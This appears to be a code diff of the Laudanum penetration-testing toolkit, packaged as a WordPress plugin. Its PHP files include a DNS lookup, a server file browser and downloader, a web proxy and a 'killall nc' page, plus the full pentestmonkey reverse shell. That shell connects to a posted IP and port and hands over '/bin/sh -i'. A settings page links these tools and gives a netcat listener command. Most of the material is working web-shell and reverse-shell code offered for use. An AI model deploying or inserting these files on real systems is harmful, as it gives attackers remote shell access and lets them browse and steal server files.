*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
class WP_Laudanum
public function __construct()
add_action('admin_menu', array(&$this, 'add_menu'));
public function __activate()
public function __deactivate()
public function add_menu()
add_options_page('Laudanum Settings', 'Laudanum', 'manage_options', 'wp_laudanum', array(&$this, 'plugin_settings_page'));
public function plugin_settings_page()
wp_die(__('You do not have sufficient permissions to access this page.'));
include(sprintf("%s/templates/settings.php", dirname(__FILE__)));
register_activation_hook(__FILE__, array('WP_Laudanum', 'activate'));
register_deactivation_hook(__FILE__, array('WP_Laudanum', 'deactivate'));
$wp_laudanum = new WP_Laudanum();
if(isset($wp_laudanum)) {
function plugin_settings_link($links)
$settings_link = '<a href="options-general.php?page=wp_laudanum">Settings</a>';
array_unshift($links, $settings_link);
return $links;
$plugin = plugin_basename(__FILE__);
add_filter("plugin_action_links_$plugin", 'plugin_settings_link');

View File

@ -0,0 +1,144 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file provides access to DNS on the system.
*** Written by Tim Medin <tim@counterhack.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
<title>Laudanum PHP DNS Access</title>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
/* Initialize some variables we need again and again. */
$query = isset($_POST['query']) ? $_POST['query'] : '';
$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';
<title>Laudanum PHP DNS Access</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
<body onload="init()">
<h1>DNS Query 0.1</h1>
<form name="dns" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST">
<legend>DNS Lookup:</legend>
<p>Query:<input name="query" type="text">
Type:<select name="type">
$types = array("A" => DNS_A, "CNAME" => DNS_CNAME, "HINFO" => DNS_HINFO, "MX" => DNS_MX, "NS" => DNS_NS, "PTR" => DNS_PTR, "SOA" => DNS_SOA, "TXT" => DNS_TXT, "AAAA" => DNS_AAAA, "SRV" => DNS_SRV, "NAPTR" => DNS_NAPTR, "A6" => DNS_A6, "ALL" => DNS_ALL, "ANY" => DNS_ANY);
if (!in_array($type, array_keys($types))) {
$type = "ANY";
$validtype = 0;
foreach (array_keys($types) as $t) {
echo " <option value=\"$t\"" . (($type == $t) ? " SELECTED" : "") . ">$t</option>\n";
<input type="submit" value="Submit">
if ($query != '')
$result = dns_get_record($query, $types[$type], $authns, $addtl);
echo "<pre><results>";
echo "Result = ";
echo "Auth NS = ";
echo "Additional = ";
echo "</results></pre>";
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -0,0 +1,182 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file allows browsing of the file system.
*** Written by Tim Medin <tim@counterhack.com>
*** 12/28/2013 - updated by Jason Gillam <jgillam@secureideas.com> - fixed parent folder.
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
<title>Laudanum PHP File Browser</title>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
/* Initialize some variables we need again and again. */
$dir = isset($_GET["dir"]) ? $_GET["dir"] : ".";
$file = isset($_GET["file"]) ? $_GET["file"] : "";
if ($file != "") {
if(file_exists($file)) {
$s = split("/", $file);
$filename = $s[count($s) - 1];
header("Content-type: application/x-download");
header("Content-Length: ".filesize($file));
header("Content-Disposition: attachment; filename=\"".$filename."\"");
<title>Laudanum File Browser</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
<body onload="init()">
<h1>Laudanum File Browser 0.1</h1>
<a href="<?php echo $_SERVER['PHP_SELF'] ?>">Home</a><br/>
// get the actual path, add an ending / if necessary
$curdir = realpath($dir);
$curdir .= substr($curdir, -1) != "/" ? "/" : "";
$dirs = split("/",$curdir);
// Create the breadcrumb
echo "<h2>Directory listing of <a href=\"" . $_SERVER['PHP_SELF'] . "?dir=/\">/</a> ";
$breadcrumb = '/';
foreach ($dirs as $d) {
if ($d != '') {
$breadcrumb .= $d . "/";
echo "<a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . urlencode($breadcrumb) . "\">$d/</a> ";
echo "</h2>";
// translate .. to a real dir
$parentdir = "";
for ($i = 0; $i < count($dirs) - 2; $i++) {
$parentdir .= $dirs[$i] . "/";
echo "<table>";
echo "<tr><th>Name</th><th>Date</th><th>Size</th></tr>";
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . $parentdir . "\">../</a></td><td> </td><td> </td></tr>";
//get listing, separate into directories and files
$listingfiles = array();
$listingdirs = array();
if ($handle = @opendir($curdir)) {
while ($o = readdir($handle)) {
if ($o == "." || $o == "..") continue;
if (@filetype($curdir . $o) == "dir") {
$listingdirs[] = $o . "/";
else {
$listingfiles[] = $o;
//display directories
foreach ($listingdirs as $f) {
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . urlencode($curdir . $f) . "\">" . $f . "</a></td><td align=\"right\">" . "</td><td> <td></tr>";
//display files
foreach ($listingfiles as $f) {
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?file=" . urlencode($curdir . $f) . "\">" . $f . "</a></td><td align=\"right\">" . "</td><td align=\"right\">" . number_format(@filesize($curdir . $f)) . "<td></tr>";
else {
echo "<tr><td colspan=\"3\"><h1>Can't open directory</h1></td></tr>";
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -0,0 +1,126 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file provides a host lookup by ip address.
*** Written by Jason Gillam <jgillam@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
<title>Laudanum PHP Hostname by IP Lookup</title>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
/* Initialize some variables we need again and again. */
$query = isset($_POST['query']) ? $_POST['query'] : '';
$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';
<title>Laudanum Host Lookup</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
<body onload="init()">
<h1>Host Lookup 0.1</h1>
<form name="dns" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST">
<legend>Host Lookup:</legend>
<p>IP:<input name="query" type="text">
<input type="submit" value="Submit">
if ($query != '')
$result = gethostbyaddr($query);
echo "<pre><results>";
echo "Result = ";
echo "</results></pre>";
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -0,0 +1,61 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file provides a rudamentary IP filter to help prevent usage of Laudanum tools
*** by someone other than the person who uploaded Laudanum. This file should be included
*** in other Laudanum tools and not called directly.
*** Written by Jason Gillam <jgillam@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
// ***************** Config entries below ***********************
// IPs are enterable as individual addresses TODO: add CIDR support
$wpl_allowedIPs = array("", "", "");
# *********** No editable content below this line **************
$wpl_allowed = 0;
foreach ($wpl_allowedIPs as $IP) {
$wpl_allowed = 1;
if ($wpl_allowed == 0) {
header("HTTP/1.0 404 Not Found");

View File

@ -0,0 +1,103 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file attempts to kill all netcat processes spawned by the current user.
*** This may be useful in cases where a reverse shell attempt has gone wrong.
*** Written by Jason Gillam <jgillam@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
<title>Laudanum PHP Hostname by IP Lookup</title>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
<title>Laudanum Kill nc</title>
<link rel="stylesheet" href="style.css" type="text/css">
<h1>Kill nc 0.1</h1>
<?php echo exec('killall nc');?>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.

View File

@ -0,0 +1,194 @@
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
// In all other respects the GPL version 2 applies:
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = isset($_POST['ip']) ? $_POST['ip'] : '';
//$ip = ''; // CHANGE THIS
//$port = 8888; // CHANGE THIS
$port = isset($_POST['port']) ? $_POST['port'] : '8888';
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
// Daemonise ourself if possible to avoid zombies later
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
if ($pid) {
exit(0); // Parent exits
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
// Change to a safe directory
// Remove any umask we inherited
// Do the reverse shell...
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";

View File

@ -0,0 +1,336 @@
ini_set('session.use_cookies', '0');
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file acts as a browser-based proxy.
*** Written by Tim Medin <tim@counterhack.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page
// figure out how to reuse sessionid from the remote site
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
<title>Laudanum PHP Proxy</title>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
function geturlarray($u) {
// creates the url array, addes a scheme if it is missing and retries parsing
$o = parse_url($u);
if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); }
if (!isset($o["path"])) { $o["path"] = "/"; }
return $o;
function buildurl ($u) {
// build the url from the url array
// this is used because the built in function isn't
// avilable in all installs of php
if (!isset($u["host"])) { return null; }
$s = isset($u["scheme"]) ? $u["scheme"] : "http";
$s .= "://" . $u["host"];
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
$s .= isset($u["path"]) ? $u["path"] : "/";
$s .= isset($u["query"]) ? "?" . $u["query"] : "";
$s .= isset($u["fragment"]) ? "#" . $u["fragment"] : "";
return $s;
function buildurlpath ($u) {
//gets the full url and attempts to remove the file at the end of the url
// e.g. http://blah.com/dir/file.ext => http://blah.com/dir/
if (!isset($u["host"])) { return null; }
$s = isset($u["scheme"])? $u["scheme"] : "http";
$s .= "://" . $u["host"];
$s .= isset($u["port"]) ? ":" . $u["port"] : "";
$path = isset($u["path"]) ? $u["path"] : "/";
// is the last portion of the path a file or a dir?
// assume if there is a . it is a file
// if it ends in a / then it is a dir
// if neither, than assume dir
$dirs = explode("/", $path);
$last = $dirs[count($dirs) - 1];
if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) {
// its a file, remove the last chunk
$path = substr($path, 0, -1 * strlen($last));
$s .= $path;
return $s;
function getfilename ($u) {
// returns the file name
// e.g. http://blah.com/dir/file.ext returns file.ext
// technically, it is the last portion of the url, so there is a potential
// for a problem if a http://blah.com/dir returns a file
$s = explode("/", $u["path"]);
return $s[count($s) - 1];
function getcontenttype ($headers) {
// gets the content type
foreach($headers as $h) {
if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) {
return $out[1][0];
function getcontentencoding ($headers) {
foreach ($headers as $h) {
if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) {
return $out[1][0];
function removeheader($header, $headers) {
foreach (array_keys($headers) as $key) {
if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) {
return $headers;
function rewritecookies($headers) {
// removes the path and domain from cookies
for ($i = 0; $i < count($headers); $i++) {
if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) {
$headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]);
$headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]);
return $headers;
function getsessionid($headers) {
for ($i = 0; $i < count($headers); $i++) {
if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out))
return $out[1][0];
return "0";
function compatible_gzinflate($gzData) {
if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) {
$i = 10;
$flg = ord( substr($gzData, 3, 1) );
if ( $flg > 0 ) {
if ( $flg & 4 ) {
list($xlen) = unpack('v', substr($gzData, $i, 2) );
$i = $i + 2 + $xlen;
if ( $flg & 8 )
$i = strpos($gzData, "\0", $i) + 1;
if ( $flg & 16 )
$i = strpos($gzData, "\0", $i) + 1;
if ( $flg & 2 )
$i = $i + 2;
return @gzinflate( substr($gzData, $i, -8) );
} else {
return false;
return false;
function rewrite ($d, $u) {
$r = $d;
//rewrite images and links - absolute reference
$r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r);
//rewrite images and links - hard linked
$r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r);
//rewrite images and links - relative reference
$r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r);
//rewrite form - absolute reference
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(\/[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . $u["scheme"] . "://" . $u["host"] . "\\3\">", $r);
//rewrite form - hard linked
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(http[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . "\\3\">", $r);
//rewrite form - relative reference
$r = preg_replace("/(<form(.+?)action.?=.?['\"])([^\/][^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . buildurlpath($u) . "\\3\">", $r);
return $r;
/* Initialize some variables we need again and again. */
$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : "";
if ($url == "") {
$url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : "";
if ($url == "") {
<title>Laudanum PHP Proxy</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
<body onload="init()">
<h1>Laudanum PHP Proxy</h1>
<form method="GET" name="proxy">
<input type="text" name="laudurl" size="70">
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
} else {
$url_c = geturlarray($url);
$params = array_merge($_GET, $_POST);
//don't pass throught the parameter we are using
//create the query or post parameters
$query = http_build_query($params);
if ($query != "") {
$url_c["query"] = $query;
//get the files
$fp = fopen(buildurl($url_c), "rb");
// use the headers, except the response code which is popped off the array
$headers = $http_response_header;
// pop
// fix cookies
$headers = rewritecookies($headers);
$ctype = getcontenttype($headers);
$cencoding = getcontentencoding($headers);
// we will remove gzip encoding later, but we need to remove the header now
// before it is added to the response.
if ($cencoding == "gzip")
$headers = removeheader("Content-Encoding", $headers);
// set headers for response to client
if (preg_match("/text|image/", $ctype)) {
// the number of headers can change due to replacement
$i = 0;
while ($i < count($headers)) {
if (strpos($headers[$i], "Set-Cookie:") == false)
// replace headers
header($headers[$i], true);
// if it is the first cookie, replace all the others. Otherwise add
header($headers[$i], false);
} else {
header("Content-Disposition: attachment; filename=" . getfilename($url_c));
// get data
if (preg_match("/text/",$ctype)) { //text
//it is a text format: html, css, js
$data = "";
while (!feof($fp)) {
$data .= fgets($fp, 4096);
// uncompress it so it can be rewritten
if ($cencoding == "gzip")
$data = compatible_gzinflate($data);
// rewrite all the links and such
echo rewrite($data, $url_c);
} else {
// binary format or something similar, let it go through

View File

@ -0,0 +1,67 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file provides a convenient menu of Laudanum tools from a Word Press settings
*** page.
*** Written by Jason Gillam <jgillam@secureideas.com>
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
<div class="wrap">
<h2>Laudanum Tools</h2>
<li><a href="<?php echo plugins_url('shell.php', __FILE__);?>">Shell</a> </li>
<li><a href="<?php echo plugins_url('dns.php', __FILE__);?>">DNS</a> </li>
<li><a href="<?php echo plugins_url('host.php', __FILE__);?>">Host Lookup</a> </li>
<li><a href="<?php echo plugins_url('file.php', __FILE__);?>">File Browser</a> </li>
<li><a href="<?php echo plugins_url('proxy.php', __FILE__);?>">Proxy</a> </li>
<li>Reverse Shell -
<form action="<?php echo plugins_url('php-reverse-shell.php', __FILE__);?>" method="post">
IP: <input name="ip" type="text" value="">
Port: <input name="port" type="text" value="8888">
<input type="submit" value="Connect"></p>
<!--<li><a href="<?php echo plugins_url('php-reverse-shell.php', __FILE__);?>">Reverse Shell (requires hard-coded config)</a> </li>-->
<li><a href="<?php echo plugins_url('killnc.php', __FILE__);?>">kill nc (recover if nc screws up your shell)</a> </li>
* for reverse shell, use netcat to listen, e.g. "nc -v -n -l 8888"

View File

@ -0,0 +1,389 @@
/* *****************************************************************************
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
